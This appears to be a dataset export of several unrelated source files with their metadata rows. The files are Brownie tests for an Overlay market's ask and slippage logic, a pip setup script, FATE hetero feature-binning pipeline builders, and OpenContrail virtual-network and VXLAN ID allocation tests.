    # zero volume -> no market impact term; asks take the higher (worse)
    # of micro/macro and grow it by e^(+delta)
    expect_ask = int(max(price_micro, price_macro) * exp(delta))
    actual_ask = int(market.ask(data, 0))
    assert actual_ask == approx(expect_ask)
@given(
    volume=strategy('decimal', min_value='0.0001', max_value='1.0000',
                    places=4))
def test_ask_adds_market_impact(market, volume, rando):
    """Ask spread grows with traded volume: e^(delta + lmbda*volume)."""
    # price data comes from an update call (update itself is covered in test_update.py)
    data = market.update({"from": rando}).return_value
    _, _, _, price_micro, price_macro, _, _, _ = data

    delta = Decimal(market.params(RiskParameter.DELTA.value) / 1e18)
    lmbda = Decimal(market.params(RiskParameter.LMBDA.value) / 1e18)

    # strategy spans 0.1% .. 100% of the cap; scale to wei-style units
    input_volume = volume * Decimal(1e18)

    # asks take the higher (worse) of micro/macro, grown by e^(delta+lmbda*volume)
    expect_ask = int(max(price_micro, price_macro) * exp(delta+lmbda*volume))
    actual_ask = int(market.ask(data, input_volume))
    assert actual_ask == approx(expect_ask)
def test_ask_reverts_when_impact_greater_than_max_slippage(market, rando):
    """ask() reverts once delta + lmbda*volume would exceed the max pow."""
    # price data comes from an update call (update itself is covered in test_update.py)
    data = market.update({"from": rando}).return_value
    _, _, _, price_micro, price_macro, _, _, _ = data

    delta = Decimal(market.params(RiskParameter.DELTA.value) / 1e18)
    lmbda = Decimal(market.params(RiskParameter.LMBDA.value) / 1e18)

    tol = 1e-4  # tolerance put at +/- 1bps
    max_pow = 20
    max_volume = (max_pow - delta) / lmbda

    # just above the boundary -> must revert
    volume = Decimal(max_volume) * Decimal(1 + tol)
    input_volume = volume * Decimal(1e18)
    with reverts("OVLV1:slippage>max"):
        market.ask(data, input_volume)

    # just below the boundary -> must not revert
    volume = Decimal(max_volume) * Decimal(1 - tol)
    input_volume = volume * Decimal(1e18)
    _ = market.ask(data, input_volume)
| 35.604938
| 78
| 0.693135
| 809
| 5,768
| 4.745365
| 0.121137
| 0.046887
| 0.039073
| 0.052097
| 0.930451
| 0.916905
| 0.897109
| 0.856473
| 0.856473
| 0.847617
| 0
| 0.021472
| 0.208738
| 5,768
| 161
| 79
| 35.826087
| 0.819676
| 0.277739
| 0
| 0.73913
| 0
| 0
| 0.023712
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 1
| 0.065217
| false
| 0
| 0.065217
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02845a53a449853263d1c4027f9f764717630cb4
| 84
|
py
|
Python
|
Exp_upload/setup.py
|
Jwy-Leo/Tool
|
bc02a2c1b450d41a2505d61551e9959359d8640b
|
[
"MIT"
] | 5
|
2018-04-24T11:44:53.000Z
|
2020-01-02T05:58:30.000Z
|
Exp_upload/setup.py
|
Jwy-Leo/Tool
|
bc02a2c1b450d41a2505d61551e9959359d8640b
|
[
"MIT"
] | null | null | null |
Exp_upload/setup.py
|
Jwy-Leo/Tool
|
bc02a2c1b450d41a2505d61551e9959359d8640b
|
[
"MIT"
] | null | null | null |
"""Bootstrap: install the third-party packages the experiment-upload tool needs."""
import os  # retained from the original file; no longer used directly
import subprocess
import sys

# Previously: os.system('pip install <pkg>'). Running pip through the current
# interpreter (`sys.executable -m pip`) guarantees the packages land in the
# right environment, and passing an argv list avoids shell string parsing.
for _package in ("gspread", "oauth2client"):
    # No check=True: os.system ignored failures, so this stays best-effort.
    subprocess.run([sys.executable, "-m", "pip", "install", _package])
| 21
| 38
| 0.75
| 12
| 84
| 5.25
| 0.583333
| 0.253968
| 0.349206
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013699
| 0.130952
| 84
| 3
| 39
| 28
| 0.849315
| 0
| 0
| 0
| 0
| 0
| 0.530864
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
65ef882c93b299f38ff422cc6fe44f8f13737371
| 12,649
|
py
|
Python
|
examples/pipeline/hetero_feature_binning/common_tools.py
|
rubenlozanoaht3m/DataDogm
|
cd605e8072cca31e8418830c3300657ae2fa5b16
|
[
"Apache-2.0"
] | 715
|
2019-01-24T10:52:03.000Z
|
2019-10-31T12:19:22.000Z
|
examples/pipeline/hetero_feature_binning/common_tools.py
|
rubenlozanoaht3m/DataDogm
|
cd605e8072cca31e8418830c3300657ae2fa5b16
|
[
"Apache-2.0"
] | 270
|
2019-02-11T02:57:36.000Z
|
2019-08-29T11:22:33.000Z
|
examples/pipeline/hetero_feature_binning/common_tools.py
|
rubenlozanoaht3m/DataDogm
|
cd605e8072cca31e8418830c3300657ae2fa5b16
|
[
"Apache-2.0"
] | 200
|
2019-01-26T14:21:35.000Z
|
2019-11-01T01:14:36.000Z
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from pipeline.backend.pipeline import PipeLine
from pipeline.component import DataTransform
from pipeline.component import HeteroFeatureBinning
from pipeline.component import Intersection
from pipeline.component import OneHotEncoder
from pipeline.component import Reader
from pipeline.interface import Data
from pipeline.interface import Model
def prettify(response, verbose=True):
    """Pretty-print *response* as indented JSON when *verbose*, then pass it through."""
    if verbose:
        formatted = json.dumps(response, indent=4, ensure_ascii=False)
        print(formatted)
        print()
    return response
def make_add_one_hot_dsl(config, namespace, bin_param, is_multi_host=False):
    """Build a hetero feature-binning pipeline followed by one-hot encoding.

    Wires: reader -> data transform -> intersection -> feature binning
    -> one-hot encoder, for both a train (reader_0) and an eval (reader_1)
    branch; the eval branch reuses models fitted on the train branch.

    :param config: parsed example config holding the participant party ids
    :param namespace: suffix appended to the "experiment" data namespace
    :param bin_param: kwargs passed to the train-side HeteroFeatureBinning
    :param is_multi_host: when True, configure a second host party as well
    :return: the compiled (not yet fitted) PipeLine object
    """
    parties = config.parties
    guest = parties.guest[0]
    hosts = parties.host

    # Train and eval tables are the same datasets here; only the reader wiring differs.
    guest_train_data = {"name": "breast_hetero_guest", "namespace": f"experiment{namespace}"}
    host_train_data = {"name": "breast_hetero_host", "namespace": f"experiment{namespace}"}
    guest_eval_data = {"name": "breast_hetero_guest", "namespace": f"experiment{namespace}"}
    host_eval_data = {"name": "breast_hetero_host", "namespace": f"experiment{namespace}"}

    # initialize pipeline
    pipeline = PipeLine()
    # set job initiator
    pipeline.set_initiator(role='guest', party_id=guest)
    # set participants information
    if is_multi_host:
        pipeline.set_roles(guest=guest, host=hosts)
    else:
        pipeline.set_roles(guest=guest, host=hosts[0])

    # define Reader components to read in data
    reader_0 = Reader(name="reader_0")
    # configure Reader for guest
    reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
    # configure Reader for host
    reader_0.get_party_instance(role='host', party_id=hosts[0]).component_param(table=host_train_data)
    if is_multi_host:
        reader_0.get_party_instance(role='host', party_id=hosts[1]).component_param(table=host_train_data)

    # reader_1 feeds the eval branch
    reader_1 = Reader(name="reader_1")
    reader_1.get_party_instance(role='guest', party_id=guest).component_param(table=guest_eval_data)
    reader_1.get_party_instance(role='host', party_id=hosts[0]).component_param(table=host_eval_data)
    if is_multi_host:
        reader_1.get_party_instance(role='host', party_id=hosts[1]).component_param(table=host_eval_data)

    # define DataTransform components
    data_transform_0 = DataTransform(name="data_transform_0")  # start component numbering at 0
    data_transform_1 = DataTransform(name="data_transform_1")

    # get DataTransform party instance of guest
    data_transform_0_guest_party_instance = data_transform_0.get_party_instance(role='guest', party_id=guest)
    # configure DataTransform for guest (guest side holds the labels)
    data_transform_0_guest_party_instance.component_param(with_label=True, output_format="dense")
    # get and configure DataTransform party instance of host
    data_transform_0.get_party_instance(role='host', party_id=hosts[0]).component_param(with_label=False)
    if is_multi_host:
        data_transform_0.get_party_instance(role='host', party_id=hosts[1]).component_param(with_label=False)

    # define Intersection components (private set intersection of sample ids)
    intersection_0 = Intersection(name="intersection_0")
    intersection_1 = Intersection(name="intersection_1")

    # binning_0 is fitted with the caller-supplied params; binning_1 reuses its model
    hetero_feature_binning_0 = HeteroFeatureBinning(**bin_param)
    hetero_feature_binning_1 = HeteroFeatureBinning(name='hetero_feature_binning_1')

    # transform_col_indexes=-1: one-hot encode every column
    one_hot_encoder_0 = OneHotEncoder(name='one_hot_encoder_0',
                                      transform_col_indexes=-1,
                                      transform_col_names=None,
                                      need_run=True)

    # add components to pipeline, in order of task execution
    pipeline.add_component(reader_0)
    pipeline.add_component(reader_1)
    pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))
    # set data_transform_1 to replicate model from data_transform_0
    pipeline.add_component(
        data_transform_1, data=Data(
            data=reader_1.output.data), model=Model(
            data_transform_0.output.model))
    # set data input sources of intersection components
    pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))
    pipeline.add_component(intersection_1, data=Data(data=data_transform_1.output.data))
    # set train & validate data of hetero_lr_0 component
    pipeline.add_component(hetero_feature_binning_0, data=Data(data=intersection_0.output.data))
    pipeline.add_component(hetero_feature_binning_1, data=Data(data=intersection_1.output.data),
                           model=Model(hetero_feature_binning_0.output.model))
    pipeline.add_component(one_hot_encoder_0, data=Data(data=hetero_feature_binning_0.output.data))

    # compile pipeline once finished adding modules, this step will form conf and dsl files for running job
    pipeline.compile()
    # pipeline.fit(work_mode=work_mode)
    return pipeline
def make_normal_dsl(config, namespace, bin_param, dataset='breast', is_multi_host=False,
                    host_dense_output=True):
    """Build a minimal hetero feature-binning pipeline (single train branch).

    Wires: reader -> data transform -> intersection -> feature binning.

    :param config: parsed example config holding the participant party ids
    :param namespace: suffix appended to the "experiment" data namespace
    :param bin_param: kwargs passed to HeteroFeatureBinning
    :param dataset: 'breast' or 'default_credit'; selects the uploaded tables
    :param is_multi_host: when True, configure all host parties, not just the first
    :param host_dense_output: host-side DataTransform output format (dense/sparse)
    :return: the compiled (not yet fitted) PipeLine object
    :raises ValueError: if *dataset* is not a recognized dataset name
    """
    parties = config.parties
    guest = parties.guest[0]
    hosts = parties.host

    # Map the dataset keyword to the uploaded FATE table names.
    if dataset == 'breast':
        guest_table_name = 'breast_hetero_guest'
        host_table_name = 'breast_hetero_host'
    elif dataset == 'default_credit':
        guest_table_name = 'default_credit_hetero_guest'
        host_table_name = 'default_credit_hetero_host'
    else:
        raise ValueError(f"dataset: {dataset} cannot be recognized")

    guest_train_data = {"name": guest_table_name, "namespace": f"experiment{namespace}"}
    host_train_data = {"name": host_table_name, "namespace": f"experiment{namespace}"}

    # initialize pipeline
    pipeline = PipeLine()
    # set job initiator
    pipeline.set_initiator(role='guest', party_id=guest)
    # set participants information
    if is_multi_host:
        pipeline.set_roles(guest=guest, host=hosts)
    else:
        pipeline.set_roles(guest=guest, host=hosts[0])

    # define Reader components to read in data
    reader_0 = Reader(name="reader_0")
    # configure Reader for guest
    reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
    # configure Reader for host
    reader_0.get_party_instance(role='host', party_id=hosts[0]).component_param(table=host_train_data)
    if is_multi_host:
        reader_0.get_party_instance(role='host', party_id=hosts[1]).component_param(table=host_train_data)

    # define DataTransform components
    data_transform_0 = DataTransform(name="data_transform_0")  # start component numbering at 0

    # get DataTransform party instance of guest
    data_transform_0_guest_party_instance = data_transform_0.get_party_instance(role='guest', party_id=guest)
    # configure DataTransform for guest (guest side holds the labels)
    data_transform_0_guest_party_instance.component_param(with_label=True, output_format="dense")
    # get and configure DataTransform party instance of host
    if host_dense_output:
        output_format = 'dense'
    else:
        output_format = 'sparse'
    if is_multi_host:
        # passing the full hosts list configures every host party at once
        data_transform_0.get_party_instance(role='host', party_id=hosts). \
            component_param(with_label=False,
                            output_format=output_format)
    else:
        data_transform_0.get_party_instance(role='host', party_id=hosts[0]). \
            component_param(with_label=False,
                            output_format=output_format)

    # define Intersection components (private set intersection of sample ids)
    intersection_0 = Intersection(name="intersection_0")
    hetero_feature_binning_0 = HeteroFeatureBinning(**bin_param)

    # add components to pipeline, in order of task execution
    pipeline.add_component(reader_0)
    pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))
    # set data input sources of intersection components
    pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))
    # set train & validate data of hetero_lr_0 component
    pipeline.add_component(hetero_feature_binning_0, data=Data(data=intersection_0.output.data))

    # compile pipeline once finished adding modules, this step will form conf and dsl files for running job
    pipeline.compile()
    # fit model
    # pipeline.fit(work_mode=work_mode)
    return pipeline
def make_asymmetric_dsl(config, namespace, guest_param, host_param, dataset='breast', is_multi_host=False,
host_dense_output=True):
parties = config.parties
guest = parties.guest[0]
hosts = parties.host
if dataset == 'breast':
guest_table_name = 'breast_hetero_guest'
host_table_name = 'breast_hetero_host'
elif dataset == 'default_credit':
guest_table_name = 'default_credit_hetero_guest'
host_table_name = 'default_credit_hetero_host'
else:
raise ValueError(f"dataset: {dataset} cannot be recognized")
guest_train_data = {"name": guest_table_name, "namespace": f"experiment{namespace}"}
host_train_data = {"name": host_table_name, "namespace": f"experiment{namespace}"}
# initialize pipeline
pipeline = PipeLine()
# set job initiator
pipeline.set_initiator(role='guest', party_id=guest)
# set participants information
if is_multi_host:
pipeline.set_roles(guest=guest, host=hosts)
else:
pipeline.set_roles(guest=guest, host=hosts[0])
# define Reader components to read in data
reader_0 = Reader(name="reader_0")
# configure Reader for guest
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
# configure Reader for host
reader_0.get_party_instance(role='host', party_id=hosts[0]).component_param(table=host_train_data)
if is_multi_host:
reader_0.get_party_instance(role='host', party_id=hosts[1]).component_param(table=host_train_data)
# define DataTransform components
data_transform_0 = DataTransform(name="data_transform_0") # start component numbering at 0
# get DataTransform party instance of guest
data_transform_0_guest_party_instance = data_transform_0.get_party_instance(role='guest', party_id=guest)
# configure DataTransform for guest
data_transform_0_guest_party_instance.component_param(with_label=True, output_format="dense")
# get and configure DataTransform party instance of host
if host_dense_output:
output_format = 'dense'
else:
output_format = 'sparse'
if is_multi_host:
data_transform_0.get_party_instance(role='host', party_id=hosts). \
component_param(with_label=False,
output_format=output_format)
else:
data_transform_0.get_party_instance(role='host', party_id=hosts[0]). \
component_param(with_label=False,
output_format=output_format)
# define Intersection components
intersection_0 = Intersection(name="intersection_0")
hetero_feature_binning_0 = HeteroFeatureBinning(name="hetero_feature_binning_0")
hetero_feature_binning_0.get_party_instance(role='guest', party_id=guest).component_param(**guest_param)
if is_multi_host:
hetero_feature_binning_0.get_party_instance(role='host', party_id=hosts).component_param(**host_param)
else:
hetero_feature_binning_0.get_party_instance(role='host', party_id=hosts[0]).component_param(**host_param)
# add components to pipeline, in order of task execution
pipeline.add_component(reader_0)
pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))
# set data input sources of intersection components
pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))
# set train & validate data of hetero_lr_0 component
pipeline.add_component(hetero_feature_binning_0, data=Data(data=intersection_0.output.data))
# compile pipeline once finished adding modules, this step will form conf and dsl files for running job
pipeline.compile()
# fit model
# pipeline.fit(work_mode=work_mode)
return pipeline
| 44.85461
| 113
| 0.737212
| 1,688
| 12,649
| 5.229265
| 0.109005
| 0.053019
| 0.045995
| 0.054379
| 0.838224
| 0.809108
| 0.794834
| 0.788943
| 0.786111
| 0.769457
| 0
| 0.012565
| 0.175745
| 12,649
| 281
| 114
| 45.014235
| 0.834069
| 0.213456
| 0
| 0.725146
| 0
| 0
| 0.10416
| 0.032594
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023392
| false
| 0
| 0.052632
| 0
| 0.099415
| 0.011696
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a011bb2de9128e2e0f9dc2988ccaf1752f8e3f4
| 113
|
py
|
Python
|
core/__init__.py
|
dokzlo13/c.nord_task
|
08428f093329d72ae2e9a79223b0d6a9e9bb78c3
|
[
"Unlicense"
] | null | null | null |
core/__init__.py
|
dokzlo13/c.nord_task
|
08428f093329d72ae2e9a79223b0d6a9e9bb78c3
|
[
"Unlicense"
] | null | null | null |
core/__init__.py
|
dokzlo13/c.nord_task
|
08428f093329d72ae2e9a79223b0d6a9e9bb78c3
|
[
"Unlicense"
] | null | null | null |
from core import marshalling
from core import utils
from core import types
from core.supervisor import Supervisor
| 28.25
| 38
| 0.858407
| 17
| 113
| 5.705882
| 0.411765
| 0.329897
| 0.43299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132743
| 113
| 4
| 38
| 28.25
| 0.989796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a106da63e94a1c05fe02c1706ad6d2c80454274
| 31,448
|
py
|
Python
|
src/config/api-server/vnc_cfg_api_server/tests/resources/test_virtual_network.py
|
atsgen/tf-controller
|
9321889cdd3d7108980cc88937b2e82956502cc5
|
[
"Apache-2.0"
] | null | null | null |
src/config/api-server/vnc_cfg_api_server/tests/resources/test_virtual_network.py
|
atsgen/tf-controller
|
9321889cdd3d7108980cc88937b2e82956502cc5
|
[
"Apache-2.0"
] | null | null | null |
src/config/api-server/vnc_cfg_api_server/tests/resources/test_virtual_network.py
|
atsgen/tf-controller
|
9321889cdd3d7108980cc88937b2e82956502cc5
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2017 Juniper Networks, Inc. All rights reserved.
#
import logging
from cfgm_common import get_bgp_rtgt_min_id
from cfgm_common import VNID_MIN_ALLOC
from cfgm_common.exceptions import BadRequest
from cfgm_common.exceptions import HttpError
from cfgm_common.exceptions import PermissionDenied
from cfgm_common.exceptions import RefsExistError
from cfgm_common.tests import test_common
from testtools import ExpectedException
from vnc_api.vnc_api import GlobalSystemConfig
from vnc_api.vnc_api import Project
from vnc_api.vnc_api import ProviderDetails
from vnc_api.vnc_api import RouteTargetList
from vnc_api.vnc_api import VirtualMachineInterface
from vnc_api.vnc_api import VirtualNetwork
from vnc_api.vnc_api import VirtualNetworkType
from vnc_cfg_api_server.tests import test_case
logger = logging.getLogger(__name__)
class TestVirtualNetwork(test_case.ApiServerTestCase):
@classmethod
def setUpClass(cls, *args, **kwargs):
cls.console_handler = logging.StreamHandler()
cls.console_handler.setLevel(logging.DEBUG)
logger.addHandler(cls.console_handler)
super(TestVirtualNetwork, cls).setUpClass(*args, **kwargs)
@classmethod
def tearDownClass(cls, *args, **kwargs):
logger.removeHandler(cls.console_handler)
super(TestVirtualNetwork, cls).tearDownClass(*args, **kwargs)
@property
def api(self):
return self._vnc_lib
def test_allocate_vn_id(self):
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_id = vn_obj.virtual_network_network_id
self.assertEqual(vn_obj.get_fq_name_str(),
mock_zk.get_vn_from_id(vn_id))
self.assertGreaterEqual(vn_id, VNID_MIN_ALLOC)
def test_deallocate_vn_id(self):
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_id = vn_obj.virtual_network_network_id
self.api.virtual_network_delete(id=vn_obj.uuid)
self.assertNotEqual(mock_zk.get_vn_from_id(vn_id),
vn_obj.get_fq_name_str())
def test_not_deallocate_vn_id_if_fq_name_does_not_correspond(self):
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_id = vn_obj.virtual_network_network_id
fake_fq_name = "fake fq_name"
mock_zk._vn_id_allocator.delete(vn_id - VNID_MIN_ALLOC)
mock_zk._vn_id_allocator.reserve(vn_id - VNID_MIN_ALLOC, fake_fq_name)
self.api.virtual_network_delete(id=vn_obj.uuid)
self.assertIsNotNone(mock_zk.get_vn_from_id(vn_id))
self.assertEqual(fake_fq_name, mock_zk.get_vn_from_id(vn_id))
def test_cannot_set_vn_id(self):
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj.set_virtual_network_network_id(42)
with ExpectedException(PermissionDenied):
self.api.virtual_network_create(vn_obj)
def test_cannot_update_vn_id(self):
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj.set_virtual_network_network_id(42)
with ExpectedException(PermissionDenied):
self.api.virtual_network_update(vn_obj)
# test can update with same value, needed internally
# TODO(ethuleau): not sure why it's needed
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj.set_virtual_network_network_id(
vn_obj.virtual_network_network_id)
self.api.virtual_network_update(vn_obj)
def test_create_vn_with_configured_rt_in_system_range(self):
gsc = self.api.global_system_config_read(GlobalSystemConfig().fq_name)
vn = VirtualNetwork('%s-vn' % self.id())
rt_name = 'target:%d:%d' % (gsc.autonomous_system,
get_bgp_rtgt_min_id(
gsc.autonomous_system) + 1000)
vn.set_route_target_list(RouteTargetList([rt_name]))
self.assertRaises(BadRequest, self.api.virtual_network_create, vn)
def test_update_vn_with_configured_rt_in_system_range(self):
gsc = self.api.global_system_config_read(GlobalSystemConfig().fq_name)
vn = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn)
rt_name = 'target:%d:%d' % (gsc.autonomous_system,
get_bgp_rtgt_min_id(
gsc.autonomous_system) + 1000)
vn.set_route_target_list(RouteTargetList([rt_name]))
self.assertRaises(BadRequest, self.api.virtual_network_update, vn)
def test_allocate_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(6000)
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_create(vn_obj)
# VN created, now read back the VN data to check if vxlan_id is set
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj_properties = vn_obj.get_virtual_network_properties()
if not vn_obj_properties:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6000)
self.assertEqual(vn_obj.get_fq_name_str() + "_vxlan",
mock_zk.get_vn_from_id(vxlan_id))
self.assertGreaterEqual(vxlan_id, VNID_MIN_ALLOC)
self.api.virtual_network_delete(id=vn_obj.uuid)
logger.debug('PASS - test_allocate_vxlan_id')
def test_cannot_allocate_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn1_obj = VirtualNetwork('%s-vn' % self.id())
vn1_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn1_obj_properties.set_vxlan_network_identifier(6001)
vn1_obj_properties.set_forwarding_mode('l2_l3')
vn1_obj.set_virtual_network_properties(vn1_obj_properties)
self.api.virtual_network_create(vn1_obj)
# VN created, now read back the VN data to check if vxlan_id is set
vn1_obj = self.api.virtual_network_read(id=vn1_obj.uuid)
vn1_obj_properties = vn1_obj.get_virtual_network_properties()
if not vn1_obj_properties:
self.fail("VN properties are not set")
vxlan_id = vn1_obj_properties.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6001)
# Verified vxlan_id for VN1, now create VN2 with same vxlan_id
vn2_obj = VirtualNetwork('%s-vn2' % self.id())
vn2_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn2_obj_properties.set_vxlan_network_identifier(6001)
vn2_obj_properties.set_forwarding_mode('l2_l3')
vn2_obj.set_virtual_network_properties(vn2_obj_properties)
with ExpectedException(BadRequest):
self.api.virtual_network_create(vn2_obj)
self.assertEqual(vn1_obj.get_fq_name_str() + "_vxlan",
mock_zk.get_vn_from_id(vxlan_id))
self.assertGreaterEqual(vxlan_id, VNID_MIN_ALLOC)
self.api.virtual_network_delete(id=vn1_obj.uuid)
logger.debug('PASS - test_cannot_allocate_vxlan_id')
def test_deallocate_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(6002)
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_create(vn_obj)
# VN created, now read back the VN data to check if vxlan_id is set
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj_properties = vn_obj.get_virtual_network_properties()
if not vn_obj_properties:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6002)
self.api.virtual_network_delete(id=vn_obj.uuid)
self.assertNotEqual(vn_obj.get_fq_name_str() + "_vxlan",
mock_zk.get_vn_from_id(vxlan_id))
logger.debug('PASS - test_deallocate_vxlan_id')
def test_update_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(6003)
vn_obj_properties.set_forwarding_mode('l2_l3')
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_create(vn_obj)
# VN created, now read back the VN data to check if vxlan_id is set
vn_obj_read = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj_properties_read = vn_obj_read.get_virtual_network_properties()
if not vn_obj_properties_read:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties_read.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6003)
# Created VN. Now Update it with a different vxlan_id
vn_obj_properties.set_vxlan_network_identifier(6004)
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_update(vn_obj)
vn_obj_read = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj_properties_read = vn_obj_read.get_virtual_network_properties()
if not vn_obj_properties_read:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties_read.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6004)
self.api.virtual_network_delete(id=vn_obj.uuid)
logger.debug('PASS - test_update_vxlan_id')
def test_cannot_update_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
vn1_obj = VirtualNetwork('%s-vn1' % self.id())
vn1_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn1_obj_properties.set_vxlan_network_identifier(6005)
vn1_obj_properties.set_forwarding_mode('l2_l3')
vn1_obj.set_virtual_network_properties(vn1_obj_properties)
self.api.virtual_network_create(vn1_obj)
# VN created, create second VN with different vxlan_id
vn2_obj = VirtualNetwork('%s-vn2' % self.id())
vn2_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn2_obj_properties.set_vxlan_network_identifier(6006)
vn2_obj_properties.set_forwarding_mode('l2_l3')
vn2_obj.set_virtual_network_properties(vn2_obj_properties)
self.api.virtual_network_create(vn2_obj)
# Created Two VNs. Now Update it second VN with 1st VNs VXLAN_ID
vn2_obj_properties.set_vxlan_network_identifier(6005)
vn2_obj.set_virtual_network_properties(vn2_obj_properties)
with ExpectedException(BadRequest):
self.api.virtual_network_update(vn2_obj)
vn_obj_read = self.api.virtual_network_read(id=vn2_obj.uuid)
vn_obj_properties_read = vn_obj_read.get_virtual_network_properties()
if not vn_obj_properties_read:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties_read.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6006)
self.api.virtual_network_delete(id=vn2_obj.uuid)
